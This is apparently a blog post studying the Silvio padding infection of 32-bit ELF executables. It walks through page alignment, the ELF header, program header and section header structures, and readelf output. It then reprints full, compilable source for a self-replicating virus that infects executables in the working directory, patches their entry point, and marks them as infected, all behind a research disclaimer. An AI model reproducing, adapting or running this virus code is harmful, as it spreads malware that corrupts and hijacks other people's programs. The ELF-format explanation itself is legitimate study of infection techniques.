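This post draws on the following articles:
The related source code can be looked up on the following two sites (the author never published Silvio's actual original source):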
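The Silvio padding infection is a simple parasitic technique that was already proposed in the 1990s. It exploits the way virtual memory is managed in pages: the parasite is placed in the page padding between the text segment and the data segment.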
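I am not entirely clear on the segment versus section terminology here. If it really means the text segment and the data segment, then vmmap shows:
The three red regions, i.e. those with protection r-xp, are the code segment, and the pink region with protection rw-p is the data segment. I cannot confirm whether they contain free memory that could hold the shellcode (the parasite).
If it means sections instead, we can inspect them with readelf -S: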
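By calculation, the .text section has size 0x195 with 16-byte alignment, so it occupies
(The calculation above is wrong.)
i.e. one page. Likewise, if we look at the segment instead: size 0x200:
Because of page alignment it is actually given a full page (0x1000 bytes), as the vmmap output above shows, so most of that page (0x1000 - 0x200 = 0xe00 bytes) is unused.
The data segment is much the same:
it is again one page.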
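The page arithmetic above can be written down as a small C sketch. The helper names `pages_needed` and `page_slack` are made up for illustration, and the page size is passed in as a parameter because I am only assuming the usual 4096-byte page here.

```c
#include <assert.h>
#include <stddef.h>

/* Number of whole pages needed to hold `size` bytes. */
size_t pages_needed(size_t size, size_t page_size)
{
    assert(page_size != 0);
    return (size + page_size - 1) / page_size;
}

/* Bytes left unused in the last page when `size` bytes start on a
 * page boundary. This is the slack a padding technique relies on. */
size_t page_slack(size_t size, size_t page_size)
{
    return pages_needed(size, page_size) * page_size - size;
}
```

With 4096-byte pages, `page_slack(0x200, 4096)` evaluates to 0xe00, so a 0x200-byte segment leaves 3584 bytes of its page unused.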
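The output above also shows that the text segment and the data segment do not start in the same way. The text segment is usually written from the very start of the page:
whereas the start of the data segment:
is not written from the beginning of a page.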
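The vast majority of today's programs are built as relocatable code for efficiency and security, but that does not rule out absolute code such as immediate addresses. So if we inject a parasite, it must not disturb the host program, which means the parasite itself has to be position-independent code (PIC).
For example, if we extend the text segment forwards or backwards, we are very likely to overwrite data and corrupt the file so that it can no longer run (by breaking relocated addresses or absolute code). Padding in front of the data segment might be an option (the data segment sits below the stack, so there is enough room), but execute permission on the data segment is hard to rely on, so the author gives the following approach:
Start padding at the page boundary. As the earlier calculation shows, both the code segment and the data segment leave large stretches of slack space unused.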
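PIC (position-independent code) exists so that multiple processes can share one dynamic library. Each process may map the library at a different address, so the code has to run correctly wherever it is loaded.
PIC makes the instruction part address-independent, so all processes can share a single copy. The data part is not address-independent; instead, each process gets its own copy in its address space.
Position-independent code is code whose variables, labels, and function calls do not use memory addresses fixed at compile time, so it can be loaded and executed at any location in memory. The supporting mechanisms include the PLT, the GOT, and the relocation tables.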
Below we focus on the three headers.
They can be found in /usr/include/elf.h, as in the figure above.
struct:
cat elf.h | grep 'e_'
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
---
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Architecture */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point virtual address */
Elf64_Off e_phoff; /* Program header table file offset */
Elf64_Off e_shoff; /* Section header table file offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size in bytes */
Elf64_Half e_phentsize; /* Program header table entry size */
Elf64_Half e_phnum; /* Program header table entry count */
Elf64_Half e_shentsize; /* Section header table entry size */
Elf64_Half e_shnum; /* Section header table entry count */
Elf64_Half e_shstrndx; /* Section header string table index */
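The key point is that the ELF header sits at the very start of the file, which makes it easy to locate. It also records the entry point, plus the location and size of the program header table and the section header table.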
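As a read-only illustration of "the ELF header is at the start of the file", here is a minimal sketch that checks a buffer for a 32-bit ELF header and pulls out the entry point. The function names `is_elf32` and `elf32_entry` are my own; the types and constants (`Elf32_Ehdr`, `ELFMAG`, `SELFMAG`, `EI_CLASS`, `ELFCLASS32`) come from `<elf.h>`.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Return 1 if `buf` (of `len` bytes) begins with a 32-bit ELF header. */
int is_elf32(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    if (len < sizeof(Elf32_Ehdr))
        return 0;
    /* ELFMAG is "\177ELF" and SELFMAG is its length (4). */
    if (memcmp(buf, ELFMAG, SELFMAG) != 0)
        return 0;
    return buf[EI_CLASS] == ELFCLASS32;
}

/* Copy the header out of the buffer (avoids unaligned access)
 * and return the entry point virtual address. */
Elf32_Addr elf32_entry(const unsigned char *buf)
{
    Elf32_Ehdr eh;
    assert(buf != NULL);
    memcpy(&eh, buf, sizeof eh);
    return eh.e_entry;
}
```

Comparing all four magic bytes with `memcmp` is a deliberate choice in this sketch: it rejects anything that does not start with exactly `\177ELF`.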
cat elf.h | grep 'sh_'
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
--------------------------------------------------------------------------------------
Elf64_Word sh_name; /* Section name (string tbl index) */
Elf64_Word sh_type; /* Section type */
Elf64_Xword sh_flags; /* Section flags */
Elf64_Addr sh_addr; /* Section virtual addr at execution */
Elf64_Off sh_offset; /* Section file offset */
Elf64_Xword sh_size; /* Section size in bytes */
Elf64_Word sh_link; /* Link to another section */
Elf64_Word sh_info; /* Additional section information */
Elf64_Xword sh_addralign; /* Section alignment */
Elf64_Xword sh_entsize; /* Entry size if section holds table */
struct:
cat elf.h | grep 'p_'
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
---
Elf64_Word p_type; /* Segment type */
Elf64_Word p_flags; /* Segment flags */
Elf64_Off p_offset; /* Segment file offset */
Elf64_Addr p_vaddr; /* Segment virtual address */
Elf64_Addr p_paddr; /* Segment physical address */
Elf64_Xword p_filesz; /* Segment size in file */
Elf64_Xword p_memsz; /* Segment size in memory */
Elf64_Xword p_align; /* Segment alignment */
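The program header is the data structure that describes how the file is laid out for execution. It is mainly used to locate each segment and its attributes, such as the address and size shown in the figure above.
LOAD marks a loadable segment; the second one is in fact the text segment.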
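To show how the text segment can be picked out of the program header table, here is a small read-only sketch over an in-memory array of `Elf32_Phdr` entries. The name `find_text_segment` is hypothetical, and the test used here (a `PT_LOAD` entry whose flags include `PF_X`) is my own simplification, not necessarily the test a given tool uses.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* Return the index of the first PT_LOAD entry whose flags include PF_X,
 * or -1 if there is none. `phdr` points at `phnum` program headers. */
int find_text_segment(const Elf32_Phdr *phdr, size_t phnum)
{
    assert(phdr != NULL || phnum == 0);
    for (size_t i = 0; i < phnum; i++) {
        if (phdr[i].p_type == PT_LOAD && (phdr[i].p_flags & PF_X))
            return (int)i;
    }
    return -1;
}
```

Applied to a table laid out like the readelf -l listing later in this post (PHDR, INTERP, LOAD R E, LOAD RW, ...), this would return the index of the first LOAD entry.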
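As the article puts it:
the parasite sits immediately after the text segment.
So the parasite generally has to become the program's entry point, a location recorded in the ELF header, and it must also be able to jump back and run the host program.
Control flow can be redirected through the entry point (e_entry), and e_phoff gives the location of the program header table (reached with lseek).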
lseek(): repositions the file offset of the open file description associated with the file descriptor fd to the argument offset according to the directive whence as follows:
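To make the lseek step concrete, here is a minimal read-only sketch that opens a file, seeks to an absolute offset with `SEEK_SET`, and reads from there. The helper name `read_file_at` is made up for this example; the same pattern would be used to reach the program header table at `e_phoff`.

```c
#include <assert.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Read up to `len` bytes from `path`, starting at absolute file offset
 * `off`. Returns the number of bytes read, or -1 on error. */
ssize_t read_file_at(const char *path, off_t off, void *buf, size_t len)
{
    assert(path != NULL && buf != NULL);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = -1;
    /* SEEK_SET: the offset is measured from the start of the file. */
    if (lseek(fd, off, SEEK_SET) != (off_t)-1)
        n = read(fd, buf, len);
    close(fd);
    return n;
}
```

For instance, reading three bytes at offset 1 of any ELF file should give back the characters `E`, `L`, `F` from the magic number.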
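Likewise, precisely because the ELF header lays out the overall structure of the file, when we pad after the end of the code segment we also have to update the sizes in the program header table, and the other affected fields, so that the file stays consistent.
Open question: I am not sure why p_offset and sh_offset need to be changed.
Similarly, the section header offsets have to be changed: the file header shows that the section header table actually sits at the tail of the file, so inserting the parasite shifts it.
Question: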
There is one hitch however. Following the ELF specifications, p_vaddr and p_offset in the Phdr must be congruent together, to modulo the page size.
key: ~= is denoting congruency.
p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)
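The author considers several options here: extending the code segment forwards, extending the code segment backwards, and extending the data segment forwards. Each of these ideas has serious problems:
In short, the parasite should be inserted at the end of the last section of the code segment, which is generally taken to be the .fini section.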
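Because the file used in the author's article is 32-bit, we also start by looking at how a 32-bit program is laid out.
Again we begin with the three headers: the file header, the program (segment) headers, and the section headers.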
shell> readelf -h hello
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x410
  Start of program headers:          52 (bytes into file)
  Start of section headers:          6092 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         29
  Section header string table index: 28
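The 32-bit file header is broadly the same as the 64-bit one: the fields are identical and in the same order, and only the widths of the address and offset fields (e_entry, e_phoff, e_shoff) differ.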
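The size difference between the two variants can be checked directly against `<elf.h>`. This is a small sketch; the helper names `ehdr_size`, `phdr_size`, and `shdr_size` are made up, and the `static_assert` lines pin the 32-bit sizes to the values readelf printed above.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* The 32-bit sizes match what readelf -h reported: 52, 32 and 40 bytes. */
static_assert(sizeof(Elf32_Ehdr) == 52, "Elf32_Ehdr is 52 bytes");
static_assert(sizeof(Elf32_Phdr) == 32, "Elf32_Phdr is 32 bytes");
static_assert(sizeof(Elf32_Shdr) == 40, "Elf32_Shdr is 40 bytes");

/* Size of the ELF header for the 32-bit (is64 == 0) or 64-bit layout. */
size_t ehdr_size(int is64)
{
    return is64 ? sizeof(Elf64_Ehdr) : sizeof(Elf32_Ehdr);
}

/* Size of one program header table entry. */
size_t phdr_size(int is64)
{
    return is64 ? sizeof(Elf64_Phdr) : sizeof(Elf32_Phdr);
}

/* Size of one section header table entry. */
size_t shdr_size(int is64)
{
    return is64 ? sizeof(Elf64_Shdr) : sizeof(Elf32_Shdr);
}
```

The 64-bit structures come out larger (64, 56 and 64 bytes) because the address, offset, and several size fields widen from 4 to 8 bytes.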
shell> readelf -l hello1
Elf file type is EXEC (Executable file)
Entry point 0x8048340
There are 9 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R   0x4
  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x006d0 0x006d0 R E 0x1000
  LOAD           0x000f0c 0x08049f0c 0x08049f0c 0x00114 0x00118 RW  0x1000
  DYNAMIC        0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x00057c 0x0804857c 0x0804857c 0x00044 0x00044 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
  GNU_RELRO      0x000f0c 0x08049f0c 0x08049f0c 0x000f4 0x000f4 R   0x1

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag .note.gnu.build-id
   06     .eh_frame_hdr
   07
   08     .init_array .fini_array .dynamic .got
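The program headers here differ considerably from those of a 64-bit program. The 32-bit layout matches what the author describes: the code segment and the data segment are adjacent. In the 64-bit case, a separate read-only segment holding .rodata (permission r) is mapped between the code segment and the data segment. (This confused me for a long time before it finally made sense.) (On 64-bit, the parasite can probably be inserted between the text segment and .rodata instead.)
One more very important point: here the file header and the header tables are covered by a readable and executable mapping, which is not the case in the 64-bit program. (I had long wondered how the section header table and the program header table could be modified if none of them were writable. Note that the infector below rewrites the file on disk, so the in-memory page permissions do not restrict it.)
I am also not sure whether every 32-bit program lacks a separate .rodata segment like this; I compiled several 32-bit binaries myself and they all looked this way.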
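To put a number on "adjacent", the distance between the two LOAD segments in the listing above can be computed from their program header fields. This is only a sketch; `segment_gap` is a made-up helper name and the inputs are simply the values readelf printed.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes of address space between the end of the lower segment
 * (lo_vaddr + lo_memsz) and the start of the higher one (hi_vaddr). */
uint32_t segment_gap(uint32_t lo_vaddr, uint32_t lo_memsz, uint32_t hi_vaddr)
{
    uint32_t lo_end = lo_vaddr + lo_memsz;
    assert(hi_vaddr >= lo_end); /* the segments must not overlap */
    return hi_vaddr - lo_end;
}
```

For the listing above, `segment_gap(0x08048000, 0x6d0, 0x08049f0c)` is 0x183c bytes: the text segment ends at 0x080486d0, and the data segment starts at 0x08049f0c in the next page.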
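By the same reasoning, we still pad into the spare file space between the code segment and the data segment. The catch is that, in an executable, the section header table comes after the code segment (at the end of the file), so padding the end of the code segment will most likely move the section header table to a new offset and indirectly invalidate the offsets recorded in the program header table.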
There is one hitch, however. According to the ELF specification, p_vaddr and p_offset in a Phdr must be congruent modulo the page size, that is:
p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)
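This means that if we pad at the end of the code segment, the inserted block must be exactly one page (PAGE_SIZE) in size, so that the file offsets of everything after it stay congruent with their virtual addresses.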
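The congruence rule is easy to check numerically. Below is a minimal sketch; `is_congruent` is a made-up helper, and the values in the usage note are taken from the data LOAD entry in the readelf listing above.

```c
#include <assert.h>
#include <stdint.h>

/* Return 1 if vaddr and offset leave the same remainder modulo
 * page_size, i.e. p_vaddr (mod PAGE_SIZE) == p_offset (mod PAGE_SIZE). */
int is_congruent(uint32_t vaddr, uint32_t offset, uint32_t page_size)
{
    assert(page_size != 0);
    return (vaddr % page_size) == (offset % page_size);
}
```

The data segment above has p_vaddr 0x08049f0c and p_offset 0xf0c, which are congruent modulo 0x1000. Shifting the offset by a whole page (0xf0c + 0x1000) keeps them congruent, while shifting it by 0x100 does not, which is why the padding has to be a full page.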
In summary, a padding infection like this has to do the following:
* -= DISCLAIMER =-
* This code is purely for research purposes and so that the reader may have a deeper understanding
* of UNIX Virus infection within ELF executables.
*
* Behavior:
* The virus copies itself to the first uninfected executable that it has write permissions to,
* therefore the virus copies itself one executable at a time. The virus writes a bit of magic
* into each binary that it infects so that it knows not to re-infect it. The virus at present
* only infects files within the current working directory, but can easily be modified.
*
* This virus extends/creates a PAGE size padding at the end of the text segment within the host
* executable, and copies itself into that location. The original entry point is patched to the
* start of the parasite which returns control back to the host after its execution.
* The code is position independent and eludes libc through syscall macros.
*
* Compile:
* gcc virus.c -o virus -nostdlib
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <linux/fcntl.h>
#include <errno.h>
#include <elf.h>
#include <asm/unistd.h>
#include <asm/stat.h>
#define PAGE_SIZE 4096
#define BUF_SIZE 1024
#define TMP "vx.tmp"
void end_code(void);
unsigned long get_eip();
unsigned long old_e_entry;
void end_code(void);
void mirror_binary_with_parasite (unsigned int, unsigned char *, unsigned int,
struct stat, char *, unsigned long);
extern int myend;
extern int foobar;
extern int real_start;
_start()
{
__asm__(".globl real_start\n"
"real_start:\n"
"pusha\n"
"call do_main\n"
"popa\n"
"jmp myend\n");
}
do_main()
{
struct linux_dirent
{
long d_ino;
off_t d_off;
unsigned short d_reclen;
char d_name[];
};
char *host;
char buf[BUF_SIZE];
char cwd[2];
struct linux_dirent *d;
int bpos;
int dd, nread;
unsigned char *tp;
int fd, i, c;
char text_found;
mode_t mode;
struct stat st;
unsigned long address_of_main = get_eip() - ((char *)&foobar - (char *)&real_start);
unsigned int parasite_size = (char *)&myend - (char *)&real_start;
parasite_size += 7;
unsigned long int leap_offset;
unsigned long parasite_vaddr;
unsigned int numbytes;
Elf32_Shdr *s_hdr;
Elf32_Ehdr *e_hdr;
Elf32_Phdr *p_hdr;
unsigned long text;
int nc;
int magic = 32769;
int m, md;
text_found = 0;
unsigned int after_insertion_offset;
unsigned int end_of_text;
char infected;
cwd[0] = '.';
cwd[1] = 0;
dd = open (cwd, O_RDONLY | O_DIRECTORY);
nread = getdents (dd, buf, BUF_SIZE);
for (bpos = 0; bpos < nread;) {
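d = (struct linux_dirent *) (buf + bpos); // current directory entry
bpos += d->d_reclen;
host = d->d_name; // name of the file in the current directory
if (host[0] == '.')
continue; // names starting with '.' are usually hidden files, so skip them
if (host[0] == 'l')
continue; // names starting with 'l' are assumed to be symlinks and are skipped too
fd = open (d->d_name, O_RDONLY); // open read-only
stat(host, &st); // get the file status
char mem[st.st_size]; // variable-length array sized to the file
infected = 0; // infection flag
c = read (fd, mem, st.st_size); // read the file contents into mem
e_hdr = (Elf32_Ehdr *) mem; // view the start of the buffer as the ELF header
if (e_hdr->e_ident[0] != 0x7f && strcmp (&e_hdr->e_ident[1], "ELF")) // check whether the file is an ELF executable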
{
close (fd);
continue;
}
else
{
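p_hdr = (Elf32_Phdr *) (mem + e_hdr->e_phoff); // address of the program header table
for (i = e_hdr->e_phnum; i-- > 0; p_hdr++) // walk the program headers looking for the code segment
{
if (p_hdr->p_type == PT_LOAD)
{
if (p_hdr->p_flags == (PF_R | PF_X)) // identify the code segment by its permissions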
{
md = open(d->d_name, O_RDONLY);
unsigned int pt = (PAGE_SIZE - 4) - parasite_size;
lseek(md, p_hdr->p_offset + p_hdr->p_filesz + pt, SEEK_SET);
read(md, &m, sizeof(magic));
if (m == magic)
infected++;
close(md);
break;
}
}
}
}
if (infected) // already infected
{
close(fd);
continue;
}
else // not yet infected
{
p_hdr = (Elf32_Phdr *) (mem + e_hdr->e_phoff);
for (i = e_hdr->e_phnum; i-- > 0; p_hdr++)
{
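if (text_found) // the code segment was already found, so this entry comes after it (e.g. the data segment): shift its file offset by one page
{
p_hdr->p_offset += PAGE_SIZE;
continue;
}
else
if (p_hdr->p_type == PT_LOAD) // look for the code segment
{
if (p_hdr->p_flags == (PF_R | PF_X))
{
text = p_hdr->p_vaddr; // virtual address of the code segment
parasite_vaddr = p_hdr->p_vaddr + p_hdr->p_filesz; // parasite address = code segment virtual address + code segment size
old_e_entry = e_hdr->e_entry; // save the original entry point
e_hdr->e_entry = parasite_vaddr; // set the new entry point
end_of_text = p_hdr->p_offset + p_hdr->p_filesz; // file offset where the code segment ends
p_hdr->p_filesz += parasite_size; // grow the code segment's size in the file
p_hdr->p_memsz += parasite_size; // and its size in memory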
text_found++;
}
}
}
}
s_hdr = (Elf32_Shdr *) (mem + e_hdr->e_shoff);
for (i = e_hdr->e_shnum; i-- > 0; s_hdr++)
{
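if (s_hdr->sh_offset >= end_of_text) // this section lies after the end of the modified code segment, so shift it by one page
s_hdr->sh_offset += PAGE_SIZE;
else
if (s_hdr->sh_size + s_hdr->sh_addr == parasite_vaddr)
s_hdr->sh_size += parasite_size; // this is the section that ends where the parasite starts, so grow it to cover the parasite
}
e_hdr->e_shoff += PAGE_SIZE; // shift the section header table offset, because the table lies after the code segment
mirror_binary_with_parasite (parasite_size, mem, end_of_text, st, host, address_of_main); // write out the mirrored copy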
close (fd);
goto done;
}
done:
close (dd);
}
void
mirror_binary_with_parasite (unsigned int psize, unsigned char *mem,
unsigned int end_of_text, struct stat st, char *host, unsigned long address_of_main)
{
int ofd;
unsigned int c;
int i, t = 0;
int magic = 32769;
char tmp[3];
tmp[0] = '.';
tmp[1] = 'v';
tmp[2] = 0;
char jmp_code[7];
jmp_code[0] = '\x68'; /* push */
jmp_code[1] = '\x00'; /* 00 */
jmp_code[2] = '\x00'; /* 00 */
jmp_code[3] = '\x00'; /* 00 */
jmp_code[4] = '\x00'; /* 00 */
jmp_code[5] = '\xc3'; /* ret */
jmp_code[6] = 0;
int return_entry_start = 1;
ofd = open (tmp, O_CREAT | O_WRONLY | O_TRUNC, st.st_mode); // create a temporary file
write (ofd, mem, end_of_text); // copy the original file up to the end of the code segment
*(unsigned long *) &jmp_code[1] = old_e_entry; // patch the original entry point into the jump stub
write (ofd, (char *)address_of_main, psize - 7); // write the parasite body
write (ofd, jmp_code, 7); // write the jump stub
lseek (ofd, (PAGE_SIZE - 4) - psize, SEEK_CUR); // skip to the last 4 bytes of the padding page, where the magic number marking the file as infected goes
write (ofd, &magic, sizeof(magic));
mem += end_of_text;
unsigned int last_chunk = st.st_size - end_of_text;
write (ofd, mem, last_chunk);
rename (tmp, host);
close (ofd);
}
unsigned long get_eip(void)
{
__asm__("call foobar\n"
".globl foobar\n"
"foobar:\n"
"pop %eax");
}
#define __syscall0(type,name) \
type name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
return(type)__res; \
}
#define __syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
return(type)__res; \
}
#define __syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
return(type)__res; \
}
#define __syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
return(type)__res; \
}
#define __syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
return(type)__res; \
}
#define __syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
return(type)__res; \
}
#define __syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
return(type)__res; \
}
__syscall1(void, exit, int, status);
__syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count);
__syscall3(off_t, lseek, int, fildes, off_t, offset, int, whence);
__syscall2(int, fstat, int, fildes, struct stat * , buf);
__syscall2(int, rename, const char *, old, const char *, new);
__syscall3(int, open, const char *, pathname, int, flags, mode_t, mode);
__syscall1(int, close, int, fd);
__syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
__syscall3(int, read, int, fd, void *, buf, size_t, count);
__syscall2(int, stat, const char *, path, struct stat *, buf);
void end_code() {
__asm__(".globl myend\n"
"myend: \n"
"mov $1,%eax \n"
"mov $0,%ebx \n"
"int $0x80 \n");
}
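Author: Hyrink
Link to this post:
Copyright notice: Unless otherwise stated, all posts on this blog are licensed under BY-NC-SA. Please credit the source when reposting!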